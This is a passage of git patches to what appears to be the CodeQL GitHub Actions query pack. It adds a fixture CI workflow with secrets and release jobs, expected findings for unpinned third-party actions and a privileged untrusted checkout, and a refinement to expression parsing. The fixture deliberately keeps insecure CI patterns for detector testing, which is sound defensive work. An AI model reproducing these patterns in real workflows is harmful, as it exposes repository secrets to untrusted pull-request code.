type: number + github_workflow: + required: true + type: string + github_event_pull_request_head_sha: + required: true + type: string + flow: + required: true + type: string + sha_to_check: + required: true + type: string + secrets: + NIXBUILD_TOKEN: + required: true + CACHIX_AUTH_TOKEN: + required: true + DOCKER_HUB_USERNAME: + required: true + DOCKER_HUB_ACCESS_TOKEN: + required: true + PABLO_PROJ_JSON: + required: true + VERCEL_TOKEN: + required: true + CANCEL_GITHUB_TOKEN: + required: true + +permissions: + pull-requests: write + +jobs: + dependency-review: + outputs: + ok: ${{ steps.ok.outputs.ok }} + concurrency: + group: ${{ inputs.github_workflow }}-dependency-review-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + needs: + - privilege-check + runs-on: + - ubuntu-latest + steps: + - name: checkout + uses: actions/checkout@v3 + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + - uses: amannn/action-semantic-pull-request@v5 + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + with: + requireScope: false + subjectPattern: (.*[a-zA-Z].*){16,} + subjectPatternError: | + https://regexper.com/#%28.*%5Ba-zA-Z%5D.*%29%7B16%2C%7D + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: dependency-review + if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} + uses: actions/dependency-review-action@v3 + with: + # GHSA-pfrx-2q88-qq97, GHSA-w5p7-h5w8-2hfq, GHSA-wcg3-cvx6-7396 are ignored because they are casued by the static Docusaurus build. Please remove when Docusaurus gets updated. + # GHSA-969w-q74q-9j8v, GHSA-44mr-8vmm-wjhg, GHSA-wh6w-3828-g9qf are ignored because they are transitive dependencies still used by the master branch of Substrate. Please remove when Substrate update the according dependencies. + # GHSA-fjx5-qpf4-xjf2 is ignored because it is a transitive dependencies still used by the master branch of ibc-proto-rs. Please remove when ibc-rs-proto updates it. + allow-ghsas: GHSA-pfrx-2q88-qq97, GHSA-w5p7-h5w8-2hfq, GHSA-wcg3-cvx6-7396, GHSA-969w-q74q-9j8v, GHSA-44mr-8vmm-wjhg, GHSA-wh6w-3828-g9qf, GHSA-ff4p-7xrq-q5r8, GHSA-xm67-587q-r2vw, GHSA-fjx5-qpf4-xjf2 + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + privilege-check: + name: "privilege-check" + if: ${{ inputs.flow == 'push' || inputs.github_event_name == 'merge_group' || (inputs.github_event_name == 'pull_request_target' && inputs.github_event_pull_request_head_repo_id != 383289760) || (inputs.github_event_name == 'pull_request' && inputs.github_event_pull_request_head_repo_id == 383289760) }} + continue-on-error: false + runs-on: ubuntu-latest + steps: + - run: | + echo "${{ inputs.github_event_name }}"" + echo "${{ inputs.flow }}"" + echo "${{ github.ref_name }}" + echo "${{ inputs.github_event_pull_request_head_repo_id }}" + + lfs-check: + name: lfs-check + needs: + - privilege-check + continue-on-error: false + runs-on: ubuntu-latest + concurrency: + group: ${{ inputs.github_workflow }}-lfs-check-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + submodules: false + lfs: true + - uses: actionsdesk/lfs-warning@v3.2 + name: lfs-warning + with: + labelName: lfs-detected! + filesizelimit: 20KB + exclusionPatterns: | + **/*.rs + **/*.ts + **/*.md + **/*.json + **/*.lock + **/*.nix + **/*.sol + **/*.toml + flake/eth-pos-devnet + - run: echo ${{ steps.lfs-warning.outputs.lfsFiles }} + + nix-flake-check: + name: "nix-flake-check" + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - privilege-check + runs-on: + - ubuntu-latest-m + continue-on-error: false + concurrency: + group: ${{ inputs.github_workflow }}-nix-flake-check-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - uses: cachix/install-nix-action@v20 + with: + nix_path: nixpkgs=channel:nixos-unstable + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + skipAddingSubstituter: false + skipPush: false + - run: | + nix --version + nix show-config + nix run .#nix-flake-check --accept-flake-config + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + # build-all-outputs-packages-arm: + # outputs: + # ok: ${{ steps.ok.outputs.ok }} + # name: build-all-outputs-packages-arm + # needs: + # - privilege-check + # runs-on: + # - aarch64-linux-80C-128GB-2048GB + # concurrency: + # group: ${{ inputs.github_workflow }}-build-all-outputs-packages-arm-${{ github.event.pull_request.number || github.ref }} + # cancel-in-progress: true + # steps: + # - name: Set up Cachix + # if: ${{ inputs.flow == 'push' }} + # uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + # with: + # authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + # name: composable + # installCommand: "true" + # - uses: actions/checkout@v3 + # if: ${{ inputs.flow == 'push' }} + # with: + # lfs: true + # ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + # persist-credentials: false + # - name: Build all packages + # if: ${{ inputs.flow == 'push' }} + # uses: "./.github/templates/watch-exec" + # with: + # command: nix -- build .#all-outputs + # - id: ok + # run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + build-all-outputs-packages: + outputs: + ok: ${{ steps.ok.outputs.ok }} + name: build-all-outputs-packages + needs: + - privilege-check + - build-all-deps-packages + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-outputs-packages-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha }} + persist-credentials: false + - name: Build all packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-outputs + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + build-all-checks-packages: + outputs: + ok: ${{ steps.ok.outputs.ok }} + name: build-all-checks-packages + needs: + - privilege-check + - build-all-outputs-packages + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-checks-packages-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: Build all packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-checks + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + + build-all-deps-packages: + name: build-all-deps-packages + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - privilege-check + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{ inputs.github_workflow }}-build-all-deps-packages-${{ matrix.runner }}-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: build-all-deps-packages + if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all-deps + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" + + draft-release-check: + name: "draft-release-check" + if: ${{ failure() || cancelled() || success() }} + continue-on-error: false + runs-on: ubuntu-latest + needs: + - build-all-checks-packages + - dependency-review + - nix-flake-check + - mantis-e2e + steps: + - run: | + echo "nix-flake-check" ${{ needs.nix-flake-check.outputs.ok }} + echo "dependency-review" ${{ needs.dependency-review.outputs.ok }} + echo "build-all-checks-packages" ${{ needs.build-all-checks-packages.outputs.ok }} + echo "mantis-e2e" ${{ needs.mantis-e2e.outputs.ok }} + - if: ${{ needs.nix-flake-check.outputs.ok == 'true' && needs.dependency-review.outputs.ok == 'true' && needs.build-all-checks-packages.outputs.ok == 'true' && needs.mantis-e2e.outputs.ok == 'true' }} + run: | + echo "All dependencies built well" + exit 0 + - if: ${{ !(needs.nix-flake-check.outputs.ok == 'true' && needs.dependency-review.outputs.ok == 'true' && needs.build-all-checks-packages.outputs.ok == 'true' && needs.mantis-e2e.outputs.ok == 'true' ) }} + run: | + echo "Some of dependencies (see jobs graph, needs attributes, and output of this job) failed" + exit 42 + + draft-release-artifacts: + name: "draft-release-artifacts" + runs-on: + - x86_64-linux-32C-128GB-2TB + needs: + - draft-release-check + if: ${{ inputs.github_event_name == 'push' }} + permissions: + pull-requests: write + contents: write + concurrency: + group: ${{ inputs.github_workflow }}-draft-release-artifacts-${{ github.ref }} + cancel-in-progress: true + steps: + - name: Set up Cachix + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Login to DockerHub + uses: docker/login-action@v2 + with: + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + - name: Download artifacts + run: | + nix run .#generate-release-artifacts --print-build-logs + + - name: Release artifacts + uses: softprops/action-gh-release@v1 + with: + draft: true + prerelease: false + fail_on_unmatched_files: true + generate_release_notes: true + body_path: release-artifacts/release.txt + name: ${{ github.ref_name }} + tag_name: ${{ github.ref_name }} + target_commitish: ${{ github.sha }} + files: | + release-artifacts/to-upload/* + + push-docker-images: + name: push-docker-images + if: ${{ inputs.flow == 'push' }} + needs: + - draft-release-check + runs-on: + - x86_64-linux-32C-128GB-2TB + concurrency: + group: ${{inputs.flow}}-${{ inputs.github_workflow }}-push-docker-images-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: false + steps: + - name: Set up Cachix + uses: cachix/cachix-action@586bf280495080c5a6d4868237ad28a860e4b309 + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + installCommand: "true" + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - name: Build all packages + uses: "./.github/templates/watch-exec" + with: + command: nix -- build .#all + - name: Publish cmc-api to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/docker-image-cmc-api.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: cmc-api + artifact: cmc-api:latest + + - name: Publish devnet-xc to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/docker-image-devnet-xc.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: devnet-xc + artifact: devnet-xc:latest + tag: ${{ inputs.github_event_name == 'push' && 'main' || ''}} + + - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/hyperspace-composable-rococo-picasso-rococo.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: hyperspace-composable-rococo-picasso-rococo + artifact: hyperspace-composable-rococo-picasso-rococo:latest + + - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub + uses: "./.github/templates/docker-publish" + with: + image_path: result/hyperspace-composable-polkadot-picasso-kusama.tar.gz + username: ${{ secrets.DOCKER_HUB_USERNAME }} + password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} + name: hyperspace-composable-polkadot-picasso-kusama + artifact: hyperspace-composable-polkadot-picasso-kusama:latest + + mantis-e2e: + name: mantis-e2e + outputs: + ok: ${{ steps.ok.outputs.ok }} + needs: + - build-all-checks-packages + runs-on: + - ubuntu-latest-m + concurrency: + group: ${{ inputs.github_workflow }}-mantis-e2e-${{ github.event.pull_request.number || github.ref }} + cancel-in-progress: true + steps: + - uses: actions/checkout@v3 + with: + lfs: true + ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} + persist-credentials: false + - uses: cachix/install-nix-action@v20 + with: + nix_path: nixpkgs=channel:nixos-unstable + - uses: DeterminateSystems/magic-nix-cache-action@main + - uses: cachix/cachix-action@master + with: + authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" + name: composable + skipAddingSubstituter: false + skipPush: false + - name: Devnet integration tests + run: | + nix run .#mantis-e2e --accept-flake-config --impure + - id: ok + run: echo "ok=true" >> "$GITHUB_OUTPUT" diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 665e9626b247..c91470d5cc84 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -16,5 +16,15 @@ | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 8707849328b8..711a529b179c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -109,6 +109,42 @@ edges | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | | .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/pr-workflow.yml:57:9:60:6 | Uses Step | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | +| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | .github/workflows/pr-workflow.yml:70:9:78:6 | Uses Step | +| .github/workflows/pr-workflow.yml:70:9:78:6 | Uses Step | .github/workflows/pr-workflow.yml:78:9:81:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | +| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | .github/workflows/pr-workflow.yml:124:9:126:2 | Run Step | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | +| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | +| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | +| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | .github/workflows/pr-workflow.yml:154:9:158:6 | Run Step | +| .github/workflows/pr-workflow.yml:154:9:158:6 | Run Step | .github/workflows/pr-workflow.yml:158:9:196:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:209:9:216:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | +| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:227:9:230:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:243:9:250:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | +| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:261:9:265:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:277:9:284:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | +| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:295:9:298:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:309:9:314:6 | Run Step | .github/workflows/pr-workflow.yml:314:9:318:6 | Run Step | +| .github/workflows/pr-workflow.yml:314:9:318:6 | Run Step | .github/workflows/pr-workflow.yml:318:9:323:2 | Run Step | +| .github/workflows/pr-workflow.yml:337:9:343:6 | Uses Step | .github/workflows/pr-workflow.yml:343:9:346:6 | Uses Step | +| .github/workflows/pr-workflow.yml:343:9:346:6 | Uses Step | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | +| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | .github/workflows/pr-workflow.yml:351:9:355:6 | Run Step | +| .github/workflows/pr-workflow.yml:351:9:355:6 | Run Step | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | +| .github/workflows/pr-workflow.yml:380:9:386:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | +| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | +| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | +| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | +| .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | @@ -170,6 +206,7 @@ edges | .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | From ef41db3ce51e254d6adc8c2ea58f8313965433a6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 13:58:24 +0200 Subject: [PATCH 500/707] Extract simple reference expression from ORed disjuncts --- ql/lib/codeql/actions/ast/internal/Ast.qll | 38 +++++++++++++++------- 1 file changed, 27 insertions(+), 11 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d9738cb74ad8..23b5ead7f0ef 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -153,17 +153,18 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { YamlNode key; YamlString value; string rawExpression; - string expression; + string fullExpression; int exprOffset; ExpressionImpl() { this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and if rawExpression.trim().regexpMatch("\\$\\{\\{.*\\}\\}") - then expression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() - else expression = rawExpression.trim() + then + fullExpression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() + else fullExpression = rawExpression.trim() } - override string toString() { result = expression } + override string toString() { result = fullExpression } override AstNodeImpl getAChildNode() { none() } @@ -173,7 +174,9 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { override YamlNode getNode() { none() } - string getExpression() { result = expression } + string getExpression() { result = fullExpression } + + string getFullExpression() { result = fullExpression } string getRawExpression() { result = rawExpression } @@ -1262,12 +1265,15 @@ class RunImpl extends StepImpl { */ bindingset[s] string getASimpleReferenceExpression(string s, int offset) { + // If the expression is ${{ inputs.foo == "foo" }} we should not consider it as a simple reference + // check that expression matches a simple reference or several simple references ORed with || + s.regexpMatch("([A-Za-z0-9'\\\"_\\[\\]\\*\\(\\)\\.\\-]+)(\\s*\\|\\|\\s*[A-Za-z0-9'\\\"_\\[\\]\\*\\(\\)\\.\\-]+)*") and // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = s.trim() .regexpFind("[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+", _, offset) - .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) + .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", _) } bindingset[s] @@ -1319,18 +1325,28 @@ string getAJsonReferenceAccessPath(string s, int offset) { } /** - * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. + * A ${{}} expression accessing a sigcle context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { + string expression; + SimpleReferenceExpressionImpl() { - exists(getASimpleReferenceExpression(expression, _)) or - exists(getAJsonReferenceExpression(expression, _)) + ( + expression = getASimpleReferenceExpression(this.getFullExpression(), _) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) and + expression = this.getFullExpression() + ) } + override string getExpression() { result = expression } + abstract string getFieldName(); abstract AstNodeImpl getTarget(); + + override string toString() { result = expression } } class JsonReferenceExpressionImpl extends ExpressionImpl { @@ -1338,8 +1354,8 @@ class JsonReferenceExpressionImpl extends ExpressionImpl { string accessPath; JsonReferenceExpressionImpl() { - innerExpression = getAJsonReferenceExpression(expression, _) and - accessPath = getAJsonReferenceAccessPath(expression, _) + innerExpression = getAJsonReferenceExpression(this.getExpression(), _) and + accessPath = getAJsonReferenceAccessPath(this.getExpression(), _) } string getInnerExpression() { result = innerExpression } From 25a210734b223d1284b06cd2da2a45701cc6a1e7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 10 Sep 2024 13:58:36 +0200 Subject: [PATCH 501/707] Update tests --- .../Security/CWE-094/.github/workflows/or.yml | 14 ------- .../CWE-094/.github/workflows/test12.yml | 13 +++++++ .../CWE-094/CodeInjectionCritical.expected | 2 + .../CWE-094/CodeInjectionMedium.expected | 1 + .../CWE-829/.github/workflows/test10.yml | 37 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 9 +++++ 